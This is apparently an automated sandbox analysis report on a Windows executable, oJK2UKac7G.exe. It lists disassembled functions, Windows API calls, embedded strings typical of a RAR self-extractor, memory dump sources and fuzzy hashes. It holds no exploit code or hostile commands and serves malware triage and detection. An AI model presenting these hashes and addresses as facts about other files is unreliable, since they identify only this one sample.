    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: _wcslen$CompareString
    • String ID:
    • API String ID: 3397213944-0
    • Opcode ID: 7f281c4a6438422cf0f8b8d885035e6932cd086aff3b4acecd76901edbf4bbff
    • Instruction ID: f59604ff7d89e6101fac0ea7a6195c8ab485a61c797ea7ef7893cd02d2bbfd20
    • Opcode Fuzzy Hash: 7f281c4a6438422cf0f8b8d885035e6932cd086aff3b4acecd76901edbf4bbff
    • Instruction Fuzzy Hash: D4F01D3214C154BFCF162F91DC09DDE3F26EB85B71B118415F6195B062CA71D652A690
    Function 00CB9CC0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
    Download Yara Rule
    APIs
    • _free.LIBCMT ref: 00CB9CDE
      • Part of subcall function 00CBA65A: RtlFreeHeap.NTDLL(00000000,00000000,?,00CBDA46,00CC4ADC,00000000,00CC4ADC,00000000,?,00CBDA6D,00CC4ADC,00000007,00CC4ADC,?,00CBDE6A,00CC4ADC), ref: 00CBA670
      • Part of subcall function 00CBA65A: GetLastError.KERNEL32(00CC4ADC,?,00CBDA46,00CC4ADC,00000000,00CC4ADC,00000000,?,00CBDA6D,00CC4ADC,00000007,00CC4ADC,?,00CBDE6A,00CC4ADC,00CC4ADC), ref: 00CBA682
    • _free.LIBCMT ref: 00CB9CF0
    • _free.LIBCMT ref: 00CB9D03
    • _free.LIBCMT ref: 00CB9D14
    • _free.LIBCMT ref: 00CB9D25
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: c182de6542ef1d013c46ec91ea95212969b9e5c3111edc7ca9494c511bad08e0
    • Instruction ID: 153896d4f16e8dda62bb9d545e048819c5cbb07aa7d0a4337661665042a6c057
    • Opcode Fuzzy Hash: c182de6542ef1d013c46ec91ea95212969b9e5c3111edc7ca9494c511bad08e0
    • Instruction Fuzzy Hash: D1F05EB48029218FC7097F1CFC467AE3BA1F725722B260617F25992270C7711D41DB87
    Function 00CAB80C Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 238COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 00CAB699: GetDC.USER32(00000000), ref: 00CAB69D
      • Part of subcall function 00CAB699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00CAB6A8
      • Part of subcall function 00CAB699: ReleaseDC.USER32(00000000,00000000), ref: 00CAB6B3
    • GetObjectW.GDI32(?,00000018,?), ref: 00CAB83C
      • Part of subcall function 00CABACE: GetDC.USER32(00000000), ref: 00CABAD7
      • Part of subcall function 00CABACE: GetObjectW.GDI32(?,00000018,?), ref: 00CABB06
      • Part of subcall function 00CABACE: ReleaseDC.USER32(00000000,?), ref: 00CABB9E
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: ObjectRelease$CapsDevice
    • String ID: (
    • API String ID: 1061551593-3887548279
    • Opcode ID: 5967505a23012d8214b7f99bd02acb6c2d7a6513b5aeeb362b872d0a1a2f0a7f
    • Instruction ID: 9c259655f689079b6eca9616f582903581c002e5e9fb182945ffdc2e03abc65f
    • Opcode Fuzzy Hash: 5967505a23012d8214b7f99bd02acb6c2d7a6513b5aeeb362b872d0a1a2f0a7f
    • Instruction Fuzzy Hash: D991ED71608751AFD624DF65C858E2BBBE8FF89704F00891EF59AD3261DB30AC45CB62
    Function 00CA2938 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: _swprintf
    • String ID: %ls$%s: %s
    • API String ID: 589789837-2259941744
    • Opcode ID: 74c6cc81d451ff2b8ac3351635536f7bf308fabce7ddcfd12f96165fda62b5ec
    • Instruction ID: bf201210573204a3b23ff793f533c69805a8ea41a1c253056818a0ca975ebc12
    • Opcode Fuzzy Hash: 74c6cc81d451ff2b8ac3351635536f7bf308fabce7ddcfd12f96165fda62b5ec
    • Instruction Fuzzy Hash: 8E51D631288327FFEA212AAECC06F277259AB17F0DF104506B397A44E5C5E25552B72B
    Function 00CB9320 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
    Download Yara Rule
    APIs
    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\oJK2UKac7G.exe,00000104), ref: 00CB9360
    • _free.LIBCMT ref: 00CB942B
    • _free.LIBCMT ref: 00CB9435
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: _free$FileModuleName
    • String ID: C:\Users\user\Desktop\oJK2UKac7G.exe
    • API String ID: 2506810119-1160765840
    • Opcode ID: cdd929888774cc73a16f85361595e3a6f6677d429265600186c4aa8e7a12b6dc
    • Instruction ID: 513a397cd2f95703bda376a6bc3eb1c42e8a906d60c6aeb11f9169ee94baf9f1
    • Opcode Fuzzy Hash: cdd929888774cc73a16f85361595e3a6f6677d429265600186c4aa8e7a12b6dc
    • Instruction Fuzzy Hash: F731AEB1A04218EFCB25DF99D881EEEBBFCEB85310F1040A6FA1497211D7708E41DB91
    Function 00CB4356 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00CB437B
    • _abort.LIBCMT ref: 00CB4486
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: EncodePointer_abort
    • String ID: MOC$RCC
    • API String ID: 948111806-2084237596
    • Opcode ID: 48d453d51a11059e03e020b0367d7a03a210c33fc951a9034d857a7c437bb4b2
    • Instruction ID: ebdb5b7316939984d1c4c11dad52d8992c60a9727a2ec3f5976575d45b7bea28
    • Opcode Fuzzy Hash: 48d453d51a11059e03e020b0367d7a03a210c33fc951a9034d857a7c437bb4b2
    • Instruction Fuzzy Hash: A1417971900249AFCF19DF98CC81AEEBBB5FF48300F188199F914A7222D335AA61DF50
    Function 00C97F1B Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 92COMMON
    Download Yara Rule
    APIs
    • __EH_prolog.LIBCMT ref: 00C97F20
      • Part of subcall function 00C942F1: __EH_prolog.LIBCMT ref: 00C942F6
    • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00C97FE5
      • Part of subcall function 00C98704: GetCurrentProcess.KERNEL32(00000020,?), ref: 00C98713
      • Part of subcall function 00C98704: GetLastError.KERNEL32 ref: 00C98759
      • Part of subcall function 00C98704: CloseHandle.KERNEL32(?), ref: 00C98768
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
    • String ID: SeRestorePrivilege$SeSecurityPrivilege
    • API String ID: 3813983858-639343689
    • Opcode ID: 31f58aa1f987c1de3ea6b85d7a3bd7ccf8d2888214f089d2c7c09541ce6eee98
    • Instruction ID: 0f01948d04d8e2783a045dcf8f323769d9da8f5dc64076d3aba1af5879e76592
    • Opcode Fuzzy Hash: 31f58aa1f987c1de3ea6b85d7a3bd7ccf8d2888214f089d2c7c09541ce6eee98
    • Instruction Fuzzy Hash: 9B31E371A11284AEDF20EFA4DC09FFE7BA9EB05354F004026F515E7192CB749E49EB61
    Function 00CABDD0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 00C912F6: GetParent.USER32(?), ref: 00C9132A
      • Part of subcall function 00C912F6: GetDlgItem.USER32(00000000,00003021), ref: 00C9133A
      • Part of subcall function 00C912F6: SetWindowTextW.USER32(00000000,00CC45F4), ref: 00C91350
    • EndDialog.USER32(?,00000001), ref: 00CABE58
    • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00CABE6D
    • SetDlgItemTextW.USER32(?,00000066,?), ref: 00CABE82
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: ItemText$DialogParentWindow
    • String ID: ASKNEXTVOL
    • API String ID: 364370097-3402441367
    • Opcode ID: 8e6dff1bcb7d3613dda1b3f25b41fee9a0be38d6abfd3dba1460691a968dedab
    • Instruction ID: b548ee72e3bd2f8cc17f5e45845f183b33ec442220a4de556bfe747e2bfbacac
    • Opcode Fuzzy Hash: 8e6dff1bcb7d3613dda1b3f25b41fee9a0be38d6abfd3dba1460691a968dedab
    • Instruction Fuzzy Hash: F511E232600612BFD6119FA8DD0AFBA3BA9EB4BB44F040014F740AB0A6C7629E11D766
    Function 00C9EC0C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
    Download Yara Rule
    APIs
    • __fprintf_l.LIBCMT ref: 00C9EC74
    • _strncpy.LIBCMT ref: 00C9ECBA
      • Part of subcall function 00CA30E5: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00CD3070,00000200,00C9EC48,00000000,?,00000050,00CD3070), ref: 00CA3102
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: ByteCharMultiWide__fprintf_l_strncpy
    • String ID: $%s$@%s
    • API String ID: 562999700-834177443
    • Opcode ID: 848b2c05bcbf74dc1758019388d502f322bfaccbb494df6f78df3c7cbc9b837d
    • Instruction ID: 4586d2587d727451f4f44e88cdea3a65752bcd9972e2b6fe72d841610c9fdd4c
    • Opcode Fuzzy Hash: 848b2c05bcbf74dc1758019388d502f322bfaccbb494df6f78df3c7cbc9b837d
    • Instruction Fuzzy Hash: 3521AF7254020CAEEF20EEA8CE49FEF3BA8AF25700F040526F961961A1E771D6549B51
    Function 00CA215F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
    Download Yara Rule
    APIs
    • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00C9C04A,00000008,?,00000000,?,00C9E685,?,00000000), ref: 00CA219E
    • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00C9C04A,00000008,?,00000000,?,00C9E685,?,00000000), ref: 00CA21A8
    • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00C9C04A,00000008,?,00000000,?,00C9E685,?,00000000), ref: 00CA21B8
    Strings
    • Thread pool initialization failed., xrefs: 00CA21D0
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: Create$CriticalEventInitializeSectionSemaphore
    • String ID: Thread pool initialization failed.
    • API String ID: 3340455307-2182114853
    • Opcode ID: ba18e8213a3fb27837e10f807be1c1ae889480530b65a2ae5d030843dd92349a
    • Instruction ID: cd80f9724d64c4c5663dc58bb5d7135c14123d0ff8b72cc0d5fd0ed5c8229ae7
    • Opcode Fuzzy Hash: ba18e8213a3fb27837e10f807be1c1ae889480530b65a2ae5d030843dd92349a
    • Instruction Fuzzy Hash: A61194B1644715AFC3215F7ADC84AABFBECEF55344F14482EF3D6C2200D6715A408B60
    Function 00CAC450 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 00C912F6: GetParent.USER32(?), ref: 00C9132A
      • Part of subcall function 00C912F6: GetDlgItem.USER32(00000000,00003021), ref: 00C9133A
      • Part of subcall function 00C912F6: SetWindowTextW.USER32(00000000,00CC45F4), ref: 00C91350
    • EndDialog.USER32(?,00000001), ref: 00CAC49E
    • GetDlgItemTextW.USER32(?,00000066,?,00000200), ref: 00CAC4B6
    • SetDlgItemTextW.USER32(?,00000067,?), ref: 00CAC4E4
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: ItemText$DialogParentWindow
    • String ID: GETPASSWORD1
    • API String ID: 364370097-3292211884
    • Opcode ID: f8a9fcf6c3b822b8bc66b159e6f172d73cb99fdeb07b6cdd5cf22f6e6ccfb39a
    • Instruction ID: e46635ea533051cb30d2d880249dc501c4c235eca1d91aadbdbf541f538c50ab
    • Opcode Fuzzy Hash: f8a9fcf6c3b822b8bc66b159e6f172d73cb99fdeb07b6cdd5cf22f6e6ccfb39a
    • Instruction Fuzzy Hash: 2911C472A0022ABADB215A649D99FFB3B7CEB0A758F114420FB15F6080C271AA019669
    Function 00CAEE1D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
    Download Yara Rule
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID:
    • String ID: RENAMEDLG$REPLACEFILEDLG
    • API String ID: 0-56093855
    • Opcode ID: 0e98b8037ccb5542a411e8ac9623ac03efe684bd2f99047331fd6136ff5c611f
    • Instruction ID: b27d575a9080405d9f3fb96a93780246f1720e7733f60ffedd33ee9bed005aa6
    • Opcode Fuzzy Hash: 0e98b8037ccb5542a411e8ac9623ac03efe684bd2f99047331fd6136ff5c611f
    • Instruction Fuzzy Hash: 8C017171605246AFDB115F29EC48BAA3FA4AB06798F14002AF50693270C2719D50DBE2
    Function 00C912F6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 00C9F608: _swprintf.LIBCMT ref: 00C9F62E
      • Part of subcall function 00C9F608: _strlen.LIBCMT ref: 00C9F64F
      • Part of subcall function 00C9F608: SetDlgItemTextW.USER32(?,00CD0274,?), ref: 00C9F6AF
      • Part of subcall function 00C9F608: GetWindowRect.USER32(?,?), ref: 00C9F6E9
      • Part of subcall function 00C9F608: GetClientRect.USER32(?,?), ref: 00C9F6F5
    • GetParent.USER32(?), ref: 00C9132A
    • GetDlgItem.USER32(00000000,00003021), ref: 00C9133A
    • SetWindowTextW.USER32(00000000,00CC45F4), ref: 00C91350
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: ItemRectTextWindow$ClientParent_strlen_swprintf
    • String ID: 0
    • API String ID: 1283792255-4108050209
    • Opcode ID: 115930cd3f691957fade3ac5787364f0b8e18cddff6e486ba4854d343e25455e
    • Instruction ID: 617c762a2dd449e7ebcc668628ed9aaf9b0ce222de9733288c0e6a919ace2b84
    • Opcode Fuzzy Hash: 115930cd3f691957fade3ac5787364f0b8e18cddff6e486ba4854d343e25455e
    • Instruction Fuzzy Hash: EDF03C70104689AADF155F61880FBBD3BA8BB05394F088128FE54949B1CB74DA91EA11
    Function 00C94957 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34COMMON
    Download Yara Rule
    APIs
    • std::_Xinvalid_argument.LIBCPMT ref: 00C9495C
      • Part of subcall function 00CAFD0D: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00CAFD19
      • Part of subcall function 00CAFD0D: ___delayLoadHelper2@8.DELAYIMP ref: 00CAFD3F
    • std::_Xinvalid_argument.LIBCPMT ref: 00C94967
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: Xinvalid_argumentstd::_$Helper2@8Load___delaystd::invalid_argument::invalid_argument
    • String ID: string too long$vector too long
    • API String ID: 2355824318-1617939282
    • Opcode ID: f3808f39dd2c5038ef3a133b088219afe37f1640bcfd95aa385e95cb904bc196
    • Instruction ID: 62e808d31c6495013dc6ec034d836a3b337f9e7a80c3af53f51b1627a7202a2b
    • Opcode Fuzzy Hash: f3808f39dd2c5038ef3a133b088219afe37f1640bcfd95aa385e95cb904bc196
    • Instruction Fuzzy Hash: 27F0A7312003046B4A28AF59EC49C4BB3EDEF85B58311052AF945C3705C7B0E90287B1
    Function 00CAAC14 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33registryCOMMON
    Download Yara Rule
    APIs
    • LoadCursorW.USER32(00000000,00007F00), ref: 00CAAC4B
    • RegisterClassExW.USER32(00000030), ref: 00CAAC6C
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: ClassCursorLoadRegister
    • String ID: 0$RarHtmlClassName
    • API String ID: 1693014935-3342523147
    • Opcode ID: 54d9cb7fe2386e5f4ee96056c803277215fc32aa7bb6ae976b59b126efa8f150
    • Instruction ID: 62dca41afcdace06f967e563da3b9be75d738487d6fcf123d3f08bd8ead7ea6a
